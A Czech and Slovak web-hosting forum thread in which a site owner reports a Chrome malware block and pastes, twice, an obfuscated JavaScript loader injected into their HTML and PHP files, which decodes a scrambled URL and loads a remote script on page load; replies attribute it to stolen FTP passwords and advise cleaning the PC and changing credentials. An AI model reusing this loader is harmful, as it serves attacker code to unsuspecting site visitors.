Malware
Moje stranky byly v prohlizeci Chrome zabolokovany z duvodu, ze se tam objevil malware http://lelyla.prodejce.cz/ nebo http://lelyla.wz.cz/
Stranky jsou zatim jeste ve vystavbe, takze obsahu a struktury si prosim nevsimejte.
Na dvou mistech a to v souberech s priponou html a php se objevil jakysi podezrely javascript, ktery se tam nejak dostal sam.
<script>/*CODE1*/ try{window.onload = function(){var Q236s4ic4454clw = document.createElement('script');Q236s4ic4454clw.setAttribute('type', 'text/javascript');Q236s4ic4454clw.setAttribute('id', 'myscript1');Q236s4ic4454clw.setAttribute('src', 'h(t)!^t^))p#@:&&/(##/&$#c^$$l^@)(i&(c$^)k))#$s^o$#r!^)^-$$$&c@$o#^m$!#.#&(e((a!s)(@t)&m((o@^^n!$!e&^&(y$#).#&c$@o$@!$^m(##(.@m@o@(b(^i&#l#!@e@)@&(-(d)&(e^&@(.))@&h)@@@o^^@m!e#&&)s)a#$$l$$#e^@!p^@l&@u#((^s^#@(.$)r$$u(:!$8!$0&$&8)@$0$!)/!o#&@c##@@n(@^!.))n@e@.)&j!@^#$p#/)^@o^c^n)((.()n^)e^$.@!)$j!^(p#!/@&)c^(l&(a&s(^s@!m^@a($^t#e!#^@)s$.^c^&#o((&m&/)(&@l&()i(@n)(k$@h&e)@$(l)$p^!e)$!$r$#.)&c!&n($@/$g#o^@&o!$$g$^l^&#@e$.&&!c#o@$$m(/$$'.replace(/\(|\!|&|#|\$|\)|@|\^/ig, ''));Q236s4ic4454clw.setAttribute('defer', 'defer');document.body.appendChild(Q236s4ic4454clw);}} catch(e) {}</script>
Nechapu jak se neco takoveho muze samo dostat do statickeho html souboru.
Muzete s tim neco udelat? Pripadne mi rici co ja mohu udelat aby se tak nedelo. Dekuji
Stranky jsou zatim jeste ve vystavbe, takze obsahu a struktury si prosim nevsimejte.
Na dvou mistech a to v souberech s priponou html a php se objevil jakysi podezrely javascript, ktery se tam nejak dostal sam.
<script>/*CODE1*/ try{window.onload = function(){var Q236s4ic4454clw = document.createElement('script');Q236s4ic4454clw.setAttribute('type', 'text/javascript');Q236s4ic4454clw.setAttribute('id', 'myscript1');Q236s4ic4454clw.setAttribute('src', 'h(t)!^t^))p#@:&&/(##/&$#c^$$l^@)(i&(c$^)k))#$s^o$#r!^)^-$$$&c@$o#^m$!#.#&(e((a!s)(@t)&m((o@^^n!$!e&^&(y$#).#&c$@o$@!$^m(##(.@m@o@(b(^i&#l#!@e@)@&(-(d)&(e^&@(.))@&h)@@@o^^@m!e#&&)s)a#$$l$$#e^@!p^@l&@u#((^s^#@(.$)r$$u(:!$8!$0&$&8)@$0$!)/!o#&@c##@@n(@^!.))n@e@.)&j!@^#$p#/)^@o^c^n)((.()n^)e^$.@!)$j!^(p#!/@&)c^(l&(a&s(^s@!m^@a($^t#e!#^@)s$.^c^&#o((&m&/)(&@l&()i(@n)(k$@h&e)@$(l)$p^!e)$!$r$#.)&c!&n($@/$g#o^@&o!$$g$^l^&#@e$.&&!c#o@$$m(/$$'.replace(/\(|\!|&|#|\$|\)|@|\^/ig, ''));Q236s4ic4454clw.setAttribute('defer', 'defer');document.body.appendChild(Q236s4ic4454clw);}} catch(e) {}</script>
Nechapu jak se neco takoveho muze samo dostat do statickeho html souboru.
Muzete s tim neco udelat? Pripadne mi rici co ja mohu udelat aby se tak nedelo. Dekuji
Je to jednoduché. Váš počítač je zavirován.
Nějaká havěť ve Vašem počítači si získala heslo k FTP (nejčastěji přes Total Commander) a to pošle kolegovi (další havěť). Kolega na jiném počítači toho pak využije a na Vaše stránky vloží škodlivý kód. A provádí to pravidelně. Takže odstraněním škodlivého kódu to nekončí.
Ze všeho nejvíc zkontrolujte počítač na přítomnost viru a neprodleně změňte heslo k přístupu na FTP. Toto heslo pak nikam neukládejte. Jedině do hlavy nebo raději na papír.
A proč bychom s tím měly něco dělat? My jsem tam ten vir nedali.
Nějaká havěť ve Vašem počítači si získala heslo k FTP (nejčastěji přes Total Commander) a to pošle kolegovi (další havěť). Kolega na jiném počítači toho pak využije a na Vaše stránky vloží škodlivý kód. A provádí to pravidelně. Takže odstraněním škodlivého kódu to nekončí.
Ze všeho nejvíc zkontrolujte počítač na přítomnost viru a neprodleně změňte heslo k přístupu na FTP. Toto heslo pak nikam neukládejte. Jedině do hlavy nebo raději na papír.
A proč bychom s tím měly něco dělat? My jsem tam ten vir nedali.
<HTML>Odvirovat pc, pak změnit heslo (a nenechávat ho uložené v ftp klinetovi) a nahrát soubory znovu.
http://www.webzdarma.cz/forum/read.php?f=6&i=55373&t=55373
http://www.webzdarma.cz/forum/read.php?f=6&i=58626&t=58622
http://www.webzdarma.cz/forum/read.php?f=6&i=58734&t=58734
atd. viz Hledání.</HTML>
http://www.webzdarma.cz/forum/read.php?f=6&i=55373&t=55373
http://www.webzdarma.cz/forum/read.php?f=6&i=58626&t=58622
http://www.webzdarma.cz/forum/read.php?f=6&i=58734&t=58734
atd. viz Hledání.</HTML>
Diky za radu . Samozrejme ze s timto vy nic delat nemuzete
Existuje nejaky bezpecnejsi ftp klient, kde by se dala hesla ukladat?
Paradoxně ty, které nejsou známe ;)
Ale raději takové, které znemožňuji snadné získání hesla. To znamená, že hesla ukládají šifrovaně a lépe ještě opatřené klíčem (hlavním heslem).
Do této skupiny zásadně nepatří Total Commader do verze 6. Ten bývá právě hlavním viníkem zavirování. Nová verze TC7 hesla už šifruje, ale nevím nakolik je spolehlivý.
Ale raději takové, které znemožňuji snadné získání hesla. To znamená, že hesla ukládají šifrovaně a lépe ještě opatřené klíčem (hlavním heslem).
Do této skupiny zásadně nepatří Total Commader do verze 6. Ten bývá právě hlavním viníkem zavirování. Nová verze TC7 hesla už šifruje, ale nevím nakolik je spolehlivý.
ja mam podobny problem....mojej znamej sa na mojej stranke zobrazuje tez ze ma malware, ale mne nie je sice pravda ze mam linux..nwm ci to s tym suvisis...ale ja nemam v skripte ziaden podozrivy kod..nic som nenasla...co mam robit aby sa jej to nezobrazovalo? viete vyzera to tak ze ja nemam zavireny comp ale nekedy adminujem stranku aj v skole a tam nwm ako su na tom compy....pls pomozte mi...diki
Viz předchozí příspěvek od Thalie.
Nemít ve stránce podezřelé javascriptové kódy lze chápat jako slušnost vůči návštěvníkům. Navíc většina dnešních prohlížečů k takovýmto stránkám přístup omezuje (minimálně vyhazuje varování), takže se autor sám přípravuje o zákazníky/návštěvníky. A kromě prohlížečů přístupům k takovýmto stránkám blokují i antivirové programy - například avast! blokuje přístup i k tomuto vláknu (přestože ten "podezřelý" kód je jako klasický obsah).
___
Jinak pro zajímavost - většina těch vkládaných skriptů dělá pouze jednu věc - pouze ve stránce vytváří iframe, který načítá další (mnohem větší) javascripty z jiných domén (většinou Čína a Rusko). Činnost těch dále načítaných skriptů už je na delší povídání ;)
Nemít ve stránce podezřelé javascriptové kódy lze chápat jako slušnost vůči návštěvníkům. Navíc většina dnešních prohlížečů k takovýmto stránkám přístup omezuje (minimálně vyhazuje varování), takže se autor sám přípravuje o zákazníky/návštěvníky. A kromě prohlížečů přístupům k takovýmto stránkám blokují i antivirové programy - například avast! blokuje přístup i k tomuto vláknu (přestože ten "podezřelý" kód je jako klasický obsah).
___
Jinak pro zajímavost - většina těch vkládaných skriptů dělá pouze jednu věc - pouze ve stránce vytváří iframe, který načítá další (mnohem větší) javascripty z jiných domén (většinou Čína a Rusko). Činnost těch dále načítaných skriptů už je na delší povídání ;)
vicky: PC ve školách často bývají zavirované. Proto se na administraci školní počítače nehodí. Navíc je tam riziko odchycení hesla, pokud nepoužíváš SFTP nebo alespoň FTPS.
Na tvé stránce žádný malware nevidím.
Na tvé stránce žádný malware nevidím.
Nové příspěvky
Prosím o obnovenie domény.
Žádost o obnovení stránek vanesa.chytrak.cz
Při nahrátí mé stranky se zobrazuje pouze půlka obrazovky ale lokálně funguje jak má
Výpadky serverů seznam.cz
Dotaz na 4 funkce, které jsem nenašel a lze-li je nějak přidat
Lze na WEB ZDARMA napojit zásilkovnu?
Načítání ze zahraničí
Započítávání reklamy do objemu přenosu dat
Problém s CSS
obnovení stránek
Problém s písmeny š a ž
Žádost o obnovení stránky
Reklama
Dvoufázové přihlašování do administrace
Překročení datového limitu Zdarma o 1GB
Žádost o obnovení stránky
aktivace
Převod domény
Šifrování přihlašovacích údajů při navázání FTP spojení
Přestalo fungovat automatické přesměrování na index.html
Žádost o obnovení stránky
VíceMultihosting tarif pro více subdomén
Žádost o obnovení stránky
Tarif zdarma definitivně nepoužitelný kvůli HTTP/HTTPS
znovu poslat aktivační email
Další témata
STATUS
FTP
HTTP
SQL
PHP
© 2002 - 2024 Web zdarma s.r.o. — zvládnete to sami